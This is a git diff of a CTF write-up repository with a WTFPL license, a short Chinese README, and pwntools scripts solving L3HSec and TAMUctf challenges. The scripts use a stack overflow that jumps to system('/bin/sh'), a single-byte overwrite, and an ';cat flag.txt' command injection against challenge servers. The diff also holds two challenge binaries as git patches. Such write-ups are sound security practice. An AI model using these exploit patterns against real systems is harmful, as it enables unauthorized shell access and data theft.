MODIFICATION - - 0. You just DO WHAT THE FUCK YOU WANT TO. +DO WHAT THE FUCK YOU WANT TO PUBLIC LICENSE + +Version 2, December 2004 + +Copyright (C) 2004 Sam Hocevar + +Everyone is permitted to copy and distribute verbatim or modified copies of +this license document, and changing it is allowed as long as the name is changed. + +DO WHAT THE FUCK YOU WANT TO PUBLIC LICENSE + +TERMS AND CONDITIONS FOR COPYING, DISTRIBUTION AND MODIFICATION + + 0. You just DO WHAT THE FUCK YOU WANT TO. diff --git a/README.md b/README.md index f6bc931..11b4458 100644 --- a/README.md +++ b/README.md @@ -1,2 +1,2 @@ -# ctf - +# ctf + diff --git a/l3hsec-writeup/README.md b/l3hsec-writeup/README.md index 850d98a..557a2b0 100644 --- a/l3hsec-writeup/README.md +++ b/l3hsec-writeup/README.md @@ -1,13 +1,13 @@ -### stack - -用ida一看,找到字符串和ebp差`0x3a`,然后发现在`0x080491E2`有`system("/bin/sh")`。没了。 - -```python -from pwn import * -pld = 'A' * (0x3a + 4) + p32(0x080491E2) -p = remote("159.65.68.241", 10003) -p.sendline(pld) -p.interactive() -``` - -> `flag{e46f5601-086c-4f06-bcb2-a021e104c5e5}` +### stack + +用ida一看,找到字符串和ebp差`0x3a`,然后发现在`0x080491E2`有`system("/bin/sh")`。没了。 + +```python +from pwn import * +pld = 'A' * (0x3a + 4) + p32(0x080491E2) +p = remote("159.65.68.241", 10003) +p.sendline(pld) +p.interactive() +``` + +> `flag{e46f5601-086c-4f06-bcb2-a021e104c5e5}` diff --git a/l3hsec-writeup/stack.py b/l3hsec-writeup/stack.py index 48e7099..b15ff31 100644 --- a/l3hsec-writeup/stack.py +++ b/l3hsec-writeup/stack.py @@ -1,5 +1,5 @@ -from pwn import * -pld = 'A' * (0x3a + 4) + p32(0x080491E2) -p = remote("159.65.68.241", 10003) -p.sendline(pld) +from pwn import * +pld = 'A' * (0x3a + 4) + p32(0x080491E2) +p = remote("159.65.68.241", 10003) +p.sendline(pld) p.interactive() \ No newline at end of file diff --git a/tamu-writeup/pwn1 b/tamu-writeup/pwn1 new file mode 100644 index 0000000000000000000000000000000000000000..2ba3d2b2d2b1644338bd9783f9f481d34612f589 GIT binary patch literal 7536 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 literal 0 HcmV?d00001 diff --git a/tamu-writeup/pwn2wp.py b/tamu-writeup/pwn2wp.py new file mode 100644 index 0000000..378b545 --- /dev/null +++ b/tamu-writeup/pwn2wp.py @@ -0,0 +1,5 @@ +from pwn import * +sh = remote("pwn.tamuctf.com", 4322) +pld = 'a' * +30 + p8(0xd8) +sh.sendline(pld) +sh.interactive() \ No newline at end of file diff --git a/tamu-writeup/pwn4 b/tamu-writeup/pwn4 new file mode 100644 index 0000000000000000000000000000000000000000..311e8a2ee75f74257c377278a33da52d933b808e GIT binary patch literal 7504 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 E-_3!+*Z=?k literal 0 HcmV?d00001 diff --git a/tamu-writeup/pwn4wp.py b/tamu-writeup/pwn4wp.py new file mode 100644 index 0000000..da0a088 --- /dev/null +++ b/tamu-writeup/pwn4wp.py @@ -0,0 +1,4 @@ +from pwn import * +sh = remote("pwn.tamuctf.com", 4324) +sh.sendline(";cat flag.txt") +sh.interactive() \ No newline at end of file